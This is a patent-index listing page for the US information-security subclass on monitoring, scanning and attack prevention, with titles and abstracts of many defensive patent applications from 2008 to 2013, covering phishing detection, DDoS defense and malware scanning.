Inventors list

Assignees list

Classification tree browser

Top 100 Inventors

Top 100 Assignees


MONITORING OR SCANNING OF SOFTWARE OR DATA INCLUDING ATTACK PREVENTION

Subclass of:

726 - Information security

Patent class list (only not empty are listed)

Deeper subclasses:

Class / Patent application numberDescriptionNumber of patent applications / Date published
726023000 Intrusion detection 1037
726025000 Vulnerability assessment 360
Entries
DocumentTitleDate
20130031627Method and System for Preventing Phishing Attacks - A method, system and program product for preventing phishing attacks, wherein the method comprises: acquiring links in a Web page; classifying the acquired links according link types; and determining whether a phishing attack exists according to the classified links, wherein the links are classified into two types: internal links belonging to the same domain as the address of the Web page, and external links belonging to a different domain from the address of the Web page. By carrying out the method or system according to the above one or more embodiments of the present disclosure, since it is first detected whether a Web page is a fake website of a phishing attack before displaying the reproduced Web page to the user and the user is warned upon detecting a fake website, unnecessary losses due to phishing attacks can be prevented.01-31-2013
20130031626METHODS OF DETECTING DNS FLOODING ATTACK ACCORDING TO CHARACTERISTICS OF TYPE OF ATTACK TRAFFIC - Disclosed are methods of detecting a domain name server (DNS) flooding attack according to characteristics of a type of attack traffic. A method of detecting an attack by checking a DNS packet transmitted over a network in a computer device connected to the network, includes determining whether the number of DNS packets previously generated within a threshold time with the same type of message, the same specific address and the same field value as in the transmitted packet is greater than or equal to a given number, and determining the transmitted DNS packet as a packet related to the attack if the number of DNS packets previously generated within the threshold time is greater than or equal to the given number.01-31-2013
20130031629Apparatus and Method for Enhancing Security of Data on a Host Computing Device and a Peripheral Device - A method of enhancing security of at least one of a host computing device and a peripheral device coupled to the host computing device through a communication interface. Data is transparently received from the peripheral device or the host computing device, and the received data is stored. The stored data is analyzed to detect a circumstance associated with a security risk. If such a circumstance is not detected, then the data is transparently forwarded to the other of the peripheral device or the host. However, if a circumstance associated with a security risk is detected, then a security process, defined by a rule, is performed. Related apparatus are provided, as well as other methods and apparatus.01-31-2013
20130031628Preventing Phishing Attacks - A method, system and program product for preventing phishing attacks, wherein the method comprises: acquiring links in a Web page; classifying the acquired links according link types; and determining whether a phishing attack exists according to the classified links, wherein the links are classified into two types: internal links belonging to the same domain as the address of the Web page, and external links belonging to a different domain from the address of the Web page. By carrying out the method or system according to the above one or more embodiments of the present disclosure, since it is first detected whether a Web page is a fake website of a phishing attack before displaying the reproduced Web page to the user and the user is warned upon detecting a fake website, unnecessary losses due to phishing attacks can be prevented.01-31-2013
20130031625CYBER THREAT PRIOR PREDICTION APPARATUS AND METHOD - Disclosed are a cyber threat prior prediction apparatus, including a DNS based C&C server detecting unit configured to analyze DNS traffic to extract a domain address which is suspected as a C&C server; a network based abnormality detecting unit configured to analyze the network traffic to detect IP addresses of zombie PCs which access the C&C server and information of the zombie PCs; and a cyber threat predicting unit configured to predict a cyber threat situation based on the information of the zombie PCs.01-31-2013
20130031630Method and Apparatus for Identifying Phishing Websites in Network Traffic Using Generated Regular Expressions - According to an aspect of this invention, a method to detect phishing URLs involves: creating a whitelist of URLs using a first regular expression; creating a blacklist of URLs using a second regular expression; comparing a URL to the whitelist; and if the URL is not on the whitelist, comparing the URL to the blacklist. False negatives and positives may be avoided by classifying Internet domain names for the target organization as “legitimate”. This classification leaves a filtered set of URLs with unknown domain names which may be more closely examined to detect a potential phishing URL. Valid domain names may be classified without end-user participation.01-31-2013
20090064330METHODS AND SYSTEMS FOR ANALYZING DATA RELATED TO POSSIBLE ONLINE FRAUD - Various embodiments of the invention provide methods, systems and software for analyzing data. In particular embodiments, for example, a set of data about a web site may be analyzed to determine whether the web site is likely to be illegitimate (e.g., to be involved in a fraudulent scheme, such as a phishing scheme, the sale of gray market goods, etc.). In an exemplary embodiment, a set of data may be divided into a plurality of components (each of which, in some cases, may be considered a separate data set). Merely by way of example, a set of data may comprise data gathered from a plurality of data sources, and/or each component may comprise data gathered from one of the plurality of data sources. As another example, a set of data may comprise a document with a plurality of sections, and each component may comprise one of the plurality of sections. Those skilled in the art will appreciate that the analysis of a particular component may comprise certain tests and/or evaluations, and that the analysis of another component may comprise different tests and/or evaluations. In other cases, the analysis of each component may comprise similar tests and/or evaluations. The variety of tests and/or evaluations generally will be implementation specific.03-05-2009
20090193522COMPUTER RESOURCE VERIFYING METHOD AND COMPUTER RESOURCE VERIFYING PROGRAM - A computer resource verifying method verifies computer resources introduced into a client device. The computer resource verifying method includes performing, by the client device, client side processing including verification of individual computer resources introduced into the client device and information collection for a dependence relation between computer resources; performing, by a server device, a server side processing by receiving information on a result of the client side processing performed in the performing of the client side processing to perform verification of the dependence relation between computer resources; and determining, by the server device, whether the client device is normal based on a verification result of the computer resources and a verification result of the dependence relation between computer resources.07-30-2009
20090193521ELECTRONIC DEVICE, UPDATE SERVER DEVICE, KEY UPDATE DEVICE - The present invention offers an electronic device that reduces the amount of data for communication required when files pertaining to software are to be updated, as compared to the conventional devices, and performs tamper detection. The present invention is an electronic device having an application file pertaining to an operation of application software and updating the application file via a network. The electronic device (i) stores therein the application file including one or more data pieces, (ii) receives, from an external apparatus via the network, update data and location information indicating a location, within the application file, which is for rewrite with the update data, (iii) rewrites only part of the application file by writing over a data piece present at the indicated location with the update data, to update the application file, and (iv) examines whether the updated application file has been tampered with.07-30-2009
20110289582METHOD FOR DETECTING MALICIOUS JAVASCRIPT - An apparatus and system for scoring and grading websites and method of operation. An apparatus receives one or more Uniform Resource Identifiers (URI), requests and receives a resource such as a webpage, and observes the behaviors of an enhanced browser emulator as controlled by javascript provided by the webpage. The enhanced browser emulator tracks behaviors which when aggregated imply malicious intent.11-24-2011
20090013404Distributed defence against DDoS attacks - When the processing resources of a host system are occupied beyond a trigger point by incoming requests, that host system issues a cool-it message that is broadcast throughout the network, eventually reaching edge routers that, in response to the message, throttle the traffic that they pass into the network. The throttling is applied in increasing amounts with increasing traffic volumes received at the edge routers. The cool-it messages are authenticated to ensure that they are not being used as instruments of a DoS attack. This mechanism also works to control legitimate network congestion, and it does not block users from a host system that is under attack.01-08-2009
20110202997METHOD AND SYSTEM FOR DETECTING AND REDUCING BOTNET ACTIVITY - A method and system for detecting and reducing botnet activity includes tracking the number of connections to a destination address over predetermined periods of time. A persistence value is assigned to the destination address based on the number of time periods during which the destination address was connected. The persistence value is compared to a threshold value and an alert is generated if the persistence value is greater than the threshold value. Known safe destinations may be entered into a whitelist.08-18-2011
20110202996Method and apparatus for verifying the integrity of software code during execution and apparatus for generating such software code - Self-modifying software code comprising a number of modules that each may be modified to be in a plurality of states during execution. In order to verify the integrity of such code, the different states of the code are calculated. For each state a checksum, e.g. a hash value, is generated for at least part of the code. During execution the state of the code is changed, modifying a module, and an integrity check is performed using the checksum for the state of the code. The checksum may be stored in a look-up table or it may be embedded in the integrity verification function. A state variable indicating the state of the modules may be used to look-up the checksum in the table. Possible states of a module is encrypted and decrypted. Also provided is an apparatus for generating protected software code.08-18-2011
20120180128Preventing Cross-Site Request Forgery Attacks on a Server - Preventing Cross-Site Request Forgery security attacks on a server in a client-server environment. In one aspect, this comprises embedding a nonce and a script in all responses from the server to the client wherein, when executed, the script adds the nonce to each request from the client to the server; sending the response with the nonce and the script to the client; and verifying that each request from the client includes the nonce sent by the server to the client. The script preferably modifies all objects, including dynamically generated objects, in a server response that may generate future requests to the server to add the nonce to the requests. The server verifies the nonce value in a request and optionally confirms the request with the client if the value differs from the value previously sent. Server-side aspects might be embodied in the server or a proxy.07-12-2012
20080256633Method and Apparatus for Determination of the Non-Replicative Behavior of a Malicious Program - Disclosed is a method, a computer system and a computer readable media product that contains a set of computer executable software instructions for directing the computer system to execute a process for determining a non-replicative behavior of a program that is suspected of containing an undesirable software entity. The process causes execution of the program in at least one known environment and automatically examines the at least one known environment to detect if a change has occurred in the environment as a result of the execution of the program. If a change is detected, the process automatically analyzes the detected change (i.e., the process performs a side effects analysis) to determine if the change resulted from execution of the program or from execution of the undesirable software entity. The process then uses the result of the analysis at least for undoing a detected change that results from execution of the undesirable software entity. The result of the analysis can also be used for informing a user of an anti-virus system of the non-replicative changes made to the environment.10-16-2008
20080256631RENEWABLE INTEGRITY ROOTED SYSTEM - A method of validating software is disclosed. The method may include receiving, at a first function, a first hash and a first version. The first function may validate a second function according to the first hash and first version. The second function may receive a second hash and a second version, and the second function may validate a third function according to the second hash and second version. The first version and first hash may be stored within the first function, for example. The first version and first hash may be stored within a manifest, for example.10-16-2008
20120246723WINDOWS KERNEL ALTERATION SEARCHING METHOD - The present invention relates to a method of detecting the alteration of the driver of a windows kernel and a system using system module information that is the unalterable information of the windows kernel.09-27-2012
20120246721METHOD AND APPARATUS FOR DETERMINING SOFTWARE TRUSTWORTHINESS - Aspects of the invention relate to a method, apparatus, and computer readable medium for determining software trustworthiness. In some examples, a software package identified as including at least one file of unknown trustworthiness is installed on a clean machine. A report package including a catalog of files that have been installed or modified on the clean machine by the software package is generated. Identification attributes for each of the files in the catalog is determined. Each of the files in the catalog is processed to assign a level of trustworthiness thereto. The report package is provided as output.09-27-2012
20120246720USING SOCIAL GRAPHS TO COMBAT MALICIOUS ATTACKS - Detection of user accounts associated with spammer attacks may be performed by constructing a social graph of email users. Biggest connected components (BCC) of the social graph may be used to identify legitimate user accounts, as the majority of the users in the biggest connected components are legitimate users. BCC users may be used to identify more legitimate users. Using degree-based detection techniques and PageRank based detection techniques, the hijacked user accounts and spammer user accounts may be identified. The users' email sending and receiving behaviors may also be examined, and the subgraph structure may be used to detect stealthy attackers. From the social graph analysis, legitimate user accounts, malicious user accounts, and compromised user accounts can be identified.09-27-2012
20120246719SYSTEMS AND METHODS FOR AUTOMATIC DETECTION OF NON-COMPLIANT CONTENT IN USER ACTIONS - Described herein are methods, systems, apparatuses and products for automatic detection of non-compliant content in user actions. An aspect provides a method including, responsive to receiving a user selection to share data via an electronic device, analyzing the data to be shared; and automatically identifying non-compliant content within the data prior to sharing the data. Other embodiments are disclosed.09-27-2012
20130086676CONTEXT-SENSITIVE TAINT ANALYSIS - In one implementation, a taint processing applied to a tainted value of an application is identified and an output context of the application associated with output of the tainted value is determined. A notification is generated if the taint processing is incompatible with the output context.04-04-2013
20100115616Storage Device and Method for Dynamic Content Tracing - A storage device and method for dynamic content tracing are provided. In one embodiment, a storage device stores content having a plurality of sequences of data, each sequence of data having original data and at least one variation of the original data. The storage device receives an identifier of a host device and, for each sequence of data, selects either the original data or one of the at least one variation of the original data based on the identifier of the host device. The storage device then assembles a version of the content from the selections and provides the assembled version of the content to the host device. The assembled version of the content is unique to the host device and therefore can be used to trace the assembled version of the content back to the host device.05-06-2010
20100115612Context-Based User Authentication, Workflow Processing, and Data Management in a Centralized Application in Communication with a Plurality of Third-Party Applications - Described are computer-based methods and apparatuses, including computer program products, for providing context-based user authentication, workflow processing and data management in a centralized application in communication with a plurality of third-party applications. Changed data from a first third-party application is received by a centralized application. The changed data is processed by the centralized application. The processing comprises determining an urgency type, a second third-party application to which at least a portion of the data is applicable, mapping the data to a second third-party application data structure, and generating a request including the data structure and based on the urgency type and the second third-party application. The request is sent to the second third-party application. Data in a database associated with the centralized application is updated based on the changed data.05-06-2010
20090055927Networked Computer System with Reduced Vulnerability to Directed Attacks - An attacker is prevented from obtaining information about the configuration of a computer system. Each of one or more revealing content elements that may be found in outgoing data transmitted by the computer system and that are capable of being used by the attacker to obtain the information about the configuration of the computer system is associated with one or more respective replacement content elements. Outgoing data to be transmitted by the computer system are then scanned for these one or more revealing content elements. A revealing content element found in the outgoing data is replaced by a replacement content element from the one or more replacement content elements associated with that revealing content element. This is done before the outgoing data is transmitted.02-26-2009
20130086678INTEGRATING SECURITY PROTECTION TOOLS WITH COMPUTER DEVICE INTEGRITY AND PRIVACY POLICY - At computer device power on, the operating system of the computer device initiates a monitor. The monitor assigns a monitoring program to each program and object (collectively, “program”) running on the computer device to monitor the activities of the program. When the monitoring program is assigned to a program, the monitoring program is assigned an integrity and/or privacy label (collectively, “integrity label”) based on predetermined criteria applied to the monitored program. The monitoring program, in turn, assigns an integrity label to the program monitored by the monitoring program. The integrity label assigned to the monitored program is less than or equal to the integrity label of the monitoring program. The monitor enforces an integrity policy of the computer device based on the integrity label assigned to monitored programs and the integrity label associated with data, another program, or a remote network resource that the monitored program is seeking to access.04-04-2013
20130086677METHOD AND DEVICE FOR DETECTING PHISHING WEB PAGE - The embodiments of the present invention provide a method and a device for detecting a phishing web page. The method includes: judging whether a unique domain name corresponding to a to-be-detected web page exists in a trusted domain name database; if the unique domain name does not exist in the trusted domain name database, determining a similarity between a content characteristic extracted from the to-be-detected web page and a content characteristic of each template file in a template file database; and determining that the to-be-detected web page is a phishing web page if the similarity between the content characteristic extracted from the to-be-detected web page and a content characteristic of at least one template file is greater than a preset similarity threshold. In the embodiments of the present invention, accuracy of a result of detecting a phishing web page is improved.04-04-2013
20130086679Responses To Server Challenges Included In A Hypertext Transfer Protocol Header - Example embodiments relate to verification of client requests based on a response to a challenge (04-04-2013
20130081134Instruction set adapted for security risk monitoring - A processor is adapted to manage security risk by updating and monitoring a taint storage element in response to receipt of taint indicators, and responding to predetermined taint conditions detecting by the monitoring. The processor can be operable to execute instructions of a defined instruction set architecture and comprises an instruction of the instruction set architecture operable to access data from a source and operable to receive a taint indicator indicative of potential security risk associated with the data. The processor can further comprise a taint storage element operable for updating in response to receipt of the taint indicator and logic. The logic can be operable to update the taint storage element, process the taint storage element, determine a security risk condition based on the processing of the taint storage element, and respond to the security risk condition.03-28-2013
20130036466INTERNET INFRASTRUCTURE REPUTATION - One or more techniques and/or systems are provided for internet connectivity protection. In particular, reputational information assigned to infrastructure components (e.g., IP addresses, name servers, domains, etc.) may be leveraged to determine whether an infrastructure component associated with a user navigating to content of a URL is malicious or safe. For example, infrastructure component data associated with a web browser navigating to a website of a URL may be collected and sent to a reputation server. The reputation server may return reputation information associated with the infrastructure component data (e.g., an IP address may be known as malicious even though the URL may not yet have a reputation). In this way, the user may be provided with notifications, such as warnings, when various unsafe conditions arise, such as interacting with an infrastructure component with a bad reputation, a resolved IP address not matching the URL, etc.02-07-2013
20130036464Processor operable to ensure code integrity - A processor can be used to ensure that program code can only be used for a designed purpose and not exploited by malware. Embodiments of an illustrative processor can comprise logic operable to execute a program instruction and to distinguish whether the program instruction is a legitimate branch instruction or a non-legitimate branch instruction.02-07-2013
20130036467METHOD AND PROCESS FOR PIN ENTRY IN A CONSISTENT SOFTWARE STACK IN CASH MACHINES - Method for checking the consistency of control software of a controller of a self-service automat having a trustworthy domain (02-07-2013
20130081136METHOD AND DEVICE FOR DETECTING FLOOD ATTACKS - Disclosed is a flood attack detection method, wherein the total number of keywords of a source packet is acquired, and the number of feature parameters corresponding to the source packet is acquired. A ratio of the number of feature parameters to the total number of keywords is compared with a preset threshold, and if the ratio is greater than or equal to the preset threshold, it is determined that a flood attack occurs.03-28-2013
20130081135INJECTION ATTACK MITIGATION USING CONTEXT SENSITIVE ENCODING OF INJECTED INPUT - A method for preventing malicious code being embedded within a scripting language of a web application accessed by a web browser (03-28-2013
20080263658USING ANTIMALWARE TECHNOLOGIES TO PERFORM OFFLINE SCANNING OF VIRTUAL MACHINE IMAGES - Methods and systems for scanning a virtual machine image. The virtual machine image may be stored as a collection of one or more virtual hard disk files. The virtual machine image may be stored by taking the virtual machine off-line or may be stored by taking a checkpoint of the virtual machine while the virtual machine is on-line. The virtual machine image is rendered to file-system data. Rendering the virtual machine image to file-system data may comprise mounting the virtual machine image's virtual hard disk drives. An anti-malware engine is invoked to scan the exposed file-system data, and data indicative of the scanning may be stored.10-23-2008
20120210422METHOD AND APPARATUS FOR DETECTING MALICIOUS SOFTWARE USING GENERIC SIGNATURES - Novel methods, components, and systems for automatically detecting malicious software are presented. More specifically, we describe methods, components, and systems for the automated deployment of generic signatures to detect malicious software. (Typically, generic signature creation and deployment require more extensive manual processes.) The disclosed invention provides a significant improvement with regard to automation compared to previous approaches.08-16-2012
20090138969DEVICE AND METHOD FOR BLOCKING AUTORUN OF MALICIOUS CODE - A device and method for blocking autorun of a malicious code through an autorun file stored in a removable storage device are provided. A device manager monitors a connection of a removable storage device, acquires a global unique identifier of the removable storage device, and deletes an autorun file for running the malicious code from the removable storage. A registry manager determines whether a registry key for storing content of the autorun file is generated using the global unique identifier of the removable storage device and deletes the registry key. The present invention can block autorun of a malicious code stored in the removable storage device by retrieving and deleting a registry key for performing the autorun technique when a removable storage device is connected to a system.05-28-2009
20130042319METHOD AND APPARATUS FOR DETECTING AND DEFENDING AGAINST CC ATTACK - A method for detecting and defending against a CC attack is disclosed, which comprises the following steps of: recording the number of times m of requests for a webpage and the number of times n of related requests for the webpage within a preset time interval if a user's request of accessing the webpage is a dynamic webpage request; and determining that the webpage is subjected to a CC attack if a value (m−n)/m is greater than or equal to a preset threshold. A corresponding apparatus is further disclosed. The method and the apparatus for detecting and defending against a CC attack of the present disclosure can accurately detect and defend against the CC attack.02-14-2013
20130042321SECURITY SYSTEMS AND METHODS - Security methods are provided. The method can include comparing a first device identifier (02-14-2013
20130036465Security controller - A security controller has first and second read request paths for performing security checking of read requests received from a master device and for controlling issuing of the read request to a safe device. If the first read request path is selected for an incoming read request then the first read request path controls issuing of the read request in dependence on result of the security checking. If the second read request path is selected, then the incoming read request is issued without waiting for a result of the security checking, and tracking data is stored indicating the result of the security checking. When receiving a response to a read request issued using the second read request path, a response path modifies the response to mask read data if the tracking data stored for the corresponding read request indicates that a security violation occurred.02-07-2013
20130042320SYSTEM, METHOD AND COMPUTER PROGRAM PRODUCT FOR SCANNING PORTIONS OF DATA - A scanning system, method and computer program product are provided. In use, portions of data are scanned. Further, access to a scanned portion of the data is allowed during scanning of another portion of the data.02-14-2013
20100043071SYSTEM AND METHOD FOR COMBATING PHISHING - In one embodiment, the present invention relates to a method and system for combating phishing. A computer receives an email comprising a sender email address and a link. The computer determines a sender domain name from the sender email address and ascertains a Uniform Resource Locator (URL) corresponding to the link. The computer then determines a link domain name from the URL. The computer then determines whether the sender domain name is different than the link domain name, so as to classify the URL as a potential phishing URL.02-18-2010
20130139258DECEPTIVE INDICIA PROFILE GENERATION FROM COMMUNICATIONS INTERACTIONS - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for generating deceptive indicia profiles may implement operations including, but not limited to: detecting one or more indicia of deception associated with one or more signals associated with communication content provided by a participant in a first communications interaction; detecting one or more indicia of deception associated with one or more signals associated with communications content provided by the participant in a second communications interaction; generating a deceptive indicia profile for the participant according to indicia of deception detected in the communications content provided by the participant in the first communications interaction and indicia of deception detected in the communications content provided by the participant in the second communications interaction; and providing a notification associated with the deceptive indicia profile for the participant to a second participant in a communications interaction with the participant.05-30-2013
20090158429METHODS AND SYSTEMS FOR ENABLING ANALYSIS OF COMMUNICATION CONTENT WHILE PRESERVING CONFIDENTIALITY - Disclosed are methods and systems for enabling analysis of communication content while preserving confidentiality. In one embodiment, communication content is processed to increase the similarity of superficially dissimilar instances of communication content and/or to increase the distinctiveness of superficially similar instances of communications content. In this embodiment at least part of the processed communication content is hashed to obscure the actual communication content. In one embodiment, social network analysis is performed on the communication content after hashing, and visualization of the social network analysis includes thread graphs and/or circular graphs.06-18-2009
20090158428Method and Device for Integrating Multiple Threat Security Services - A method and device for integrating multiple threat security services are disclosed. The method may comprise parsing an incoming packet at a current layer and analyzing the packet with respect to multiple threat security services and so that one or more threat security services needed by the packet may be determined. According to an exemplary embodiment, the current layer may be a layer in a protocol stack constructed based on the multiple threat security services. With this method, integrated multiple threat security services may filter application data and parse network packet data via a single integrated entity, and thus the efficacy of filtering application data may be improved while computation overhead may be reduced.06-18-2009
20090158427SIGNATURE STRING STORAGE MEMORY OPTIMIZING METHOD, SIGNATURE STRING PATTERN MATCHING METHOD, AND SIGNATURE STRING MATCHING ENGINE - Enclosed are a signature string storage memory optimizing method, a signature string pattern matching method, and a signature matching engine. Signature is tokenized in units of substrings and the tokenized substrings are stored in an internal memory block and an external memory block to optimize a memory storage pattern. Therefore, matching of introduction data to signature patterns is effectively performed.06-18-2009
20090158426TRACEBACK METHOD AND SIGNAL RECEIVING APPARATUS - The present invention provides a traceback method including: receiving data including router information according to a path of an attacker; filtering the data to hash the data, and storing the resultant hashed information; determining whether the data is normally received on the basis of the hashed information; and predicting a path loss on the basis of the determination result. Therefore, it is possible to perform an accurate IP traceback using a probabilistic packing marking method and a hash-based traceback method.06-18-2009
20100107251MIME Handling Security Enforcement - A model restricts un-trusted data/objects from running on a user's machine without permission. The data is received by a protocol layer that reports a MIME type associated with the DATA, and caches the data and related cache file name (CFN). A MIME sniffer is arranged to identify a sniffed MIME type based on the cached data, the CFN, and the reported MIME type. Reconciliation logic evaluates the sniffed MIME type and the CFN to determine a reconciled MIME type, and to update the CFN. A class ID sniffer evaluates the updated CFN, the cached data, and the reconciled MIME type to determine an appropriate class ID. Security logic evaluates the updated CFN, the reported class ID, and other related system parameters to build a security matrix. Parameters from the security matrix are used to intercept data/objects before an un-trusted data/object can create a security breach on the machine.04-29-2010
20100107250METHOD AND APPARATUS FOR DEFENDING AGAINST ARP SPOOFING ATTACKS - A method and an apparatus for defending against Address Resolution Protocol (ARP) spoofing attacks are disclosed. The method includes: when an ARP entry is updatable, judging whether the MAC address of a received ARP message is the same as the MAC address in the ARP entry, where the ARP message has the same Internet Protocol (IP) address as the ARP entry; if the MAC addresses are different, determining the received ARP message as an ambiguous ARP message and starting an ARP verification process, or else starting no ARP verification. In this way, when no address spoofing attacks occur, no verification messages are generated, and thus reducing signaling interactions and saving network resources; besides, spooling attacks possibly happening at any time are avoided, which effectively prevents address spoofing attacks via random scanning and protects the normal application of the real host.04-29-2010
20100107249Method, Apparatus, and Device for Protecting Against Programming Attacks and/or Data Corruption - The method and accompanying apparatus and device protects against programming attacks and/or data corruption by computer viruses, malicious code, or other types of corruption. In one example, signature verification policy information that identifies a plurality of policies associated with a plurality of target memory segments is programmed during a secure boot process. The programmed signature verification policy information associated with each of the plurality of target memory segments is then evaluated during run-time. Signature verification is then repeatedly performed, during run-time, on each of the plurality of target memory segments based on the programmed signature verification policy information associated with each target memory segment.04-29-2010
20100107248REAL-TIME DATA PROTECTION METHOD AND DATA PROTECTION DEVICE FOR IMPLEMENTING THE SAME - A real-time data protection method includes: receiving input data from an input device; storing the input data; sending the input data to a computing device, thereby permitting the computing device to generate result data based on the input data; receiving the result data from the computing device; generating test data that correspond to the result data; comparing the test data to the input data; and when it is determined that the test data are not identical to the input data, indicating that the result data have been modified. A data protection device that implements the real-time data protection method is also disclosed.04-29-2010
20100107247SYSTEM AND METHOD FOR IDENTIFICATION, PREVENTION AND MANAGEMENT OF WEB-SITES DEFACEMENT ATTACKS - A system and method for identifying websites' defacement attacks by identifying of unauthorized network content pages or parts of pages that are defined as defaced-pages. The application may enable identifying defacing parts of a network content page by comparing the source code of the network content page with the source code of reference defaced-pages, which may be network content pages that were already identified as unauthorized defaced-pages and their source codes have already been stored in at least one database. Once a defacing-page is identified, the system may enable removing of the defacing-page and replacing it with the last corresponding network content page that has preceded the defacing one.04-29-2010
20100107246TERMINAL DEVICE AND METHOD FOR CHECKING A SOFTWARE PROGRAM - A terminal device according to the present invention includes: a first domain configured to execute multiple software programs; and a second domain configured to operate independently of the first domain and to check whether or not the software programs are safe. The second domain includes: an execution sequence storage unit configured to store execution priority of the multiple software programs to be executed by the first domain; a software program checking unit configured to check whether or not the multiple software programs are safe, according to the execution sequence storage unit; and an execution restricting unit configured to restrict the first domain from executing a software program included in the multiple software programs and having a check result indicating that the software program is unsafe, before checking of all the multiple, software programs is completed.04-29-2010
20100107245TAMPER-TOLERANT PROGRAMS - Tamper-tolerant programs enable correct and continued execution despite attacks. Programs can be transformed into tamper-tolerant versions that correct effects of tampering in response to detection thereof Tamper-tolerant programs can execute alone or in conjunction with tamper resistance/prevention mechanisms such as obfuscation and encryption/decryption, among other things. In fact, the same and/or similar mechanisms can be employed to protect tamper tolerance functionality.04-29-2010
20100107244Trust Event Notification and Actions Based on Thresholds and Associated Trust Metadata Scores - An approach is provided for selecting one or more trust factors from trust factors included in a trust index repository. Thresholds are identified corresponding to one or more of the selected trust factors. Actions are identified to perform when the selected trust factors reach the corresponding threshold values. The identified thresholds, identified actions, and selected trust factors are stored in a data store. The selected trust factors are monitored by comparing one or more trust metadata scores with the stored identified thresholds. The stored identified actions that correspond to the selected trust factors are performed when one or more of the trust metadata scores reach the identified thresholds. At least one of the actions includes an event notification that is provided to a trust data consumer.04-29-2010
20080295170PEER-TO-PEER NAME RESOLUTION PROTOCOL (PNRP) SECURITY INFRASTRUCTURE AND METHOD11-27-2008
20090165133SYSTEM FOR EXECUTING PROGRAM USING VIRTUAL MACHINE MONITOR AND METHOD OF CONTROLLING THE SYSTEM - A system for executing a program using a virtual machine monitor and a method of controlling the system are provided. The system includes a virtual machine monitor which divides an operating system (OS) into at least one root domain and a plurality of domains having different trust levels, and a trust-management module which is included in the root domain and periodically measures the trust level of an application program currently being executed in the OS. The virtual machine monitor executes the application program in one of the domains in consideration of the trust level of the application program. The method includes dividing an OS into at least a root domain and a plurality of domains having different trust levels by using a virtual machine monitor, enabling the root domain to periodically measure the trust level of an application program currently being executed in the OS, and executing the application program in one of the domains according to the trust level of the application program.06-25-2009
20120167212METHODS FOR INSPECTING SECURITY CERTIFICATES BY NETWORK SECURITY DEVICES TO DETECT AND PREVENT THE USE OF INVALID CERTIFICATES - Disclosed are methods and media for inspecting security certificates. Methods include the steps of: scanning, by a network security device, messages of a security protocol between a server and a client system; detecting the messages having a security certificate; detecting suspicious security certificates from the messages; and aborting particular sessions of the security protocol associated with the suspicious certificates. Preferably, the step of scanning is performed only on messages of server certificate records. Preferably, the method further includes the step of sending an invalid-certificate notice to the server and the client system. Preferably, the step of detecting the suspicious certificates includes detecting a use of an incorrectly-generated private key for the certificates. Preferably, the step of detecting the suspicious certificates includes detecting an unavailability of revocation information for the certificates. Preferably, the step of detecting the suspicious certificates includes detecting a use of an invalid cryptographic algorithm for the certificates.06-28-2012
20120167211Method and Apparatus to Harden a Software Execution in Random Access Memory - Example embodiments of the present invention relate to a system, apparatus and methods for preserving the integrity of a code to prevent it from being modified, maliciously or inadvertently, while it is in execution in the RAM of a computer platform. This method also may be referred to as code hardening. Code to be hardened in example embodiments of the present invention may be referred to as protected code. Example embodiments of the present invention are able to externally detect unauthorized stoppage of the hypervisor by employing (1) a launch-time metric of the protected code; (2) a run-time metric of the protected code; and (3) a liveliness indicator of the protected code.06-28-2012
20120167205RUNTIME PLATFORM FIRMWARE VERIFICATION - Embodiments of the invention are directed towards logic and/or modules stored in processor secure storage to determine whether a first platform firmware image (e.g., basic input/output system (BIOS), device read-only memory (ROM), manageability engine firmware) loaded onto a processor cache is valid. The processor executes the first platform firmware image if it is determined to be valid. If the first platform image is determined to be invalid, a second platform firmware image is located. If this platform firmware image is determined to be valid, the processor will execute said second platform image.06-28-2012
20120167204ISOLATION TOOL FOR USER ASSISTANCE IN SOLVING A CAPTCHA TEST - A method includes displaying a CAPTCHA test comprising an image with distorted alphanumeric characters. The method also includes associating a mask with the image that maps the alphanumeric characters to coordinates. Further, the method includes, enhancing a portion of the image corresponding to one of the alphanumeric characters responsive to a user positioning an assistance tool proximate to one alphanumeric character to reduce distortion.06-28-2012
20130047253METHOD AND APPARATUS FOR TOKEN-BASED REAL-TIME RISK UPDATING - According to one embodiment, an apparatus may store a plurality of tokens indicating a user is accessing a resource over a network. The plurality of tokens may include a risk token indicating a risk associated with access by the user to the resource. The apparatus may detect a token indicating a change associated with accessing the resource, and determine that the change triggers a risk update. The apparatus may then generate a dataset token that represents the risk token and the token indicating the change, and communicate the dataset token to a token provider to perform the risk update. The apparatus may then receive a recomputed risk token representing an updated risk. The updated risk may indicate the risk associated with continuing access to the resource with the change.02-21-2013
20130047254METHOD AND APPARATUS FOR TOKEN-BASED TRANSACTION TAGGING - According to one embodiment, an apparatus may monitor a session that facilitates the processing of a transaction. The transaction may represent an action taken against a resource during the session. The apparatus may determine that the transaction qualifies for additional monitoring, and in response, generate a tag. The tag may be unique to the transaction. The apparatus may then associate the tag with the transaction to facilitate tracing of the transaction. The apparatus may then trace the transaction during the processing of the transaction by following the tag, and communicate a message to transfer the transaction to an isolated processing unit. The isolated processing unit processes the transaction in isolation.02-21-2013
20090064326METHOD AND A SYSTEM FOR ADVANCED CONTENT SECURITY IN COMPUTER NETWORKS - The present invention relates to a method and a system for protecting data in a computer network. A device is placed on a network edge in such a way, that all outgoing data has to pass through it. Separately, a set of data that is not allowed to leave the network is defined and stored in a secure form (typically, one way hash). The device determines the network protocol, file type, transforms and normalizes the passing data, and seeks the presence of the data from the defined set. If a threshold amount of the protected data is present, the device takes one of the following actions: block, alert, log, redact, store, redirect, encrypt, notify sender.03-05-2009
20090044271INPUT AND OUTPUT VALIDATION - The present description refers in particular to a computer-implemented method, a computer system, and a computer program product for input validation and output validation to prevent SQL injections. In one aspect, an embodiment of the invention involves a service (e.g., a web service operating on a server) receiving a request message from a client over a network. The server includes a handler for checking the request message according to a first method, prior to sending the request message to the service. In addition, the handler checks a response message (from the service) according to the first method, prior to sending the response message to the client.02-12-2009
20090044270NETWORK ELEMENT AND AN INFRASTRUCTURE FOR A NETWORK RISK MANAGEMENT SYSTEM - A system for a communication infrastructure in a network including at least one connected system (CS) and at least one network risk management network element (SW), wherein the network acts as a virtual network comprising at least one virtual network element, and wherein the at least one virtual network element takes over the roles of existing network elements comprising at least one of a switch, a router, a firewall and an intrusion prevention system (IPS), and wherein the virtual network is comprised of physical elements that work together to form the network's infrastructure.02-12-2009
